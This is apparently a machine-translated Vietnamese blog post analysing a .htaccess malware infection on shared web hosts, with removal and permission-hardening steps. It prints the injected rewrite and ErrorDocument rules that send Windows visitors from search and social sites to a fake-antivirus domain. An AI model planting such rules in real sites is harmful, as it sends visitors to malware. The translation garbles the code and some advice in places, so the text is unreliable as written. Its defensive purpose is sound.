Phần mềm độc hại / Vi rút - .htaccess "viết lại" & chuyển hướng

Một hình thức mới của virus mà tôi thấy không biết nhiều, các trang web ảnh hưởng đến lưu trữ trên các máy chủ không đáng tin cậy nơi tài khoản người dùng / tài khoản miền phụ có thể được "nhìn thấy" giữa chúng. Cụ thể, các tài khoản lưu trữ đều được đưa vào thư mục "vhosts“, Và quyền viết của thư mục người dùng của "vhosts" được cấp cho người dùng thông thường… bởi người bán lại trong hầu hết các trường hợp. Đây là một phương pháp điển hình của các máy chủ web không sử dụng WHM / cPanel.

Hành động của virus .Htaccess - Hack .htaccess

Virus ảnh hưởng đến các tập tin Htaccess. Trang web của nạn nhân. Họ nói thêm dòng / Chỉ thị để chuyển hướng truy cập (đến từ yahoo, msn, google, facebook, yaindex, twitter, myspace, v.v. các trang web và cổng thông tin có lưu lượng truy cập cao) đến một số trang web cung cấp "chống virus“. Đó là về chống virus giả mạo, Nào tôi đã viết trong phần giới thiệu .

Đây là cách một Htaccess. bị ảnh hưởng: (không truy cập vào đường URL nội dung dưới đây)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

Viết lại RewriteEngine

RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vkontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Twitter. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Live. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * AOL. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MSN. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Amazon. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ebay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LinkedIn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Livejasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * DoubleClick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. *wordpress. * $ [NC, HOẶC]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Yêu cầu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * AltaVista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MSN. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * HotBot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Goto. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tìm kiếm. * $ [NC, OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,HOẶC]
RewriteCond% {HTTP_REFERER}. * Mail. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]

RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = r [R, L]

RewriteCond% {REQUEST_FILENAME}-f!
RewriteCond% {REQUEST_FILENAME}!-D
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = 4 [R, L]

Những người sử dụng WordPress họ sẽ tìm thấy những dòng này trong tệp Htaccess. từ public_html. Ngoài ra, vi-rút tạo ra một tệp .htaccess giống hệt trong thư mục wp-nội dung.

*Cũng có những tình huống mà thay vì peoriavascularsurgery.com, nó xuất hiện dns.thesoulfoodcafe.com hoặc các địa chỉ khác.

Virus này đang làm gì?

Sau khi được chuyển hướng, khách truy cập được chào đón với vòng tay rộng mở bằng thông báo:

Cảnh báo!
Máy tính của bạn có nhiều dấu hiệu khác nhau về sự hiện diện của vi rút và chương trình phần mềm độc hại. của bạn system yêu cầu kiểm tra chống vi rút ngay lập tức!
System Bảo mật sẽ thực hiện quét vi rút và chương trình độc hại trên PC của bạn nhanh chóng và miễn phí.

phần mềm độc hại 1

Bất kể chúng ta nhấn nút nào, chúng ta sẽ được đưa đến trang "Máy tính của tôi", Được tạo ra để bắt chước Thiết kế XP. Đây là nơi "quá trình quét" bắt đầu tự động, khi kết thúc quá trình này, chúng tôi phát hiện ra rằng "chúng tôi đã bị nhiễm".

phần mềm độc hại 2

Sau khi nhấn OK hoặc Hủy, nó sẽ bắt đầu tải vềcủa một tập tin setup.exe. Điều này setup.exe là phần mềm diệt vi rút giả mạo ảnh hưởng đến hệ thống. Nó sẽ cài đặt một loạt các ứng dụng phần mềm độc hại để phát tán thêm các liên kết bị nhiễm và ngoài ra phần mềm chống virus (cũng là hàng giả) mà nạn nhân được mời mua.
Những người đã nhiễm dạng vi rút này có thể sử dụng nó . Quét toàn bộ ổ cứng cũng được khuyến khích. giới thiệu Kaspersky Internet Security hoặc Kaspersky Anti-Virus.

Dạng vi-rút này ảnh hưởng đến hệ điều hành của khách truy cập có hệ điều hành Windows XP, Windows ME Windows 2000, Windows NT Windows 98 si Windows 95. Cho đến nay, không có trường hợp lây nhiễm hệ điều hành nào được biết đến Windows Có Windows 7.

Làm cách nào chúng ta có thể loại bỏ vi-rút .htaccess này khỏi máy chủ và làm cách nào để ngăn chặn sự lây nhiễm.

1. Phân tích tệp và xóa mã đáng ngờ. Để đảm bảo rằng không chỉ tệp bị ảnh hưởng Htaccess. nó là tốt để chúng tôi phân tích tất cả các tệp Php. si . Js.

2. Viết lại tệp .htaccess và thiết lập nó chmod 644 hoặc 744 chỉ với quyền ghi trên chủ sở hữu người dùng.

3. Khi tạo tài khoản lưu trữ cho một trang web, trong thư mục / Home hoặc / webroot sẽ tự động tạo một thư mục thường có tên người dùng (người dùng cho cpanel, ftp, Vân vân). Để ngăn việc ghi dữ liệu và truyền vi rút từ người dùng này sang người dùng khác, bạn nên đặt trên mỗi thư mục người dùng:

chmod 644 hoặc 744, 755 – 644 được chỉ định.
chown -R tên người dùng folder_name.
chgrp -R user_name folder_name

ls-tất cả để kiểm tra xem các chế độ đã được đặt đúng chưa. Cái gì đó như:

drwx - x - x 12 dinamics dinamics 4096 ngày 6 tháng 14 51:XNUMX dinamics /
drwx - x - x 10 duran duran 4096 Ngày 7 tháng 07 46:XNUMX duran /
drwx - x - x 12 ống nghiệm ống nghiệm 4096 Jan 29 11:23 ống nghiệm /
drwxr-xr-x 14 express express 4096 Feb 26 2009 express /
drwxr-xr-x 9 ezo ezo 4096 19 tháng 01 09:XNUMX ezo /
drwx - x - x 9 farma farma 4096 19/22 29:XNUMX farma /

Nếu một trong những người dùng trên sẽ có trên FTP File bị nhiễm, nó sẽ không thể gửi vi-rút đến người dùng được lưu trữ khác. Đây là biện pháp bảo mật tối thiểu để bảo vệ các tài khoản được lưu trữ trên máy chủ web.

Các yếu tố chung của các miền bị ảnh hưởng bởi loại vi rút này.

Tất cả các miền bị ảnh hưởng đều chuyển hướng khách truy cập đến các trang web có chứa tên miền "/main.php? s = 4 & H".

Điều này "vi rút .htaccess”Ảnh hưởng đến bất kỳ loại CMS nào (joomla, WordPress, phpBB, v.v.) sử dụng Htaccess.

.htaccess Virus Hack & Redirect.

Người sáng lập và biên tập viên Stealth Settings, từ năm 2006 đến nay. Có kinh nghiệm về hệ điều hành Linux (Đặc biệt CentOS), Mac OS X, Windows XP> Windows 10 si WordPress (CMS).

Làm thế nào để » AntiVirus & Security » Phần mềm độc hại / Vi rút - .htaccess "viết lại" & chuyển hướng
Để lại một bình luận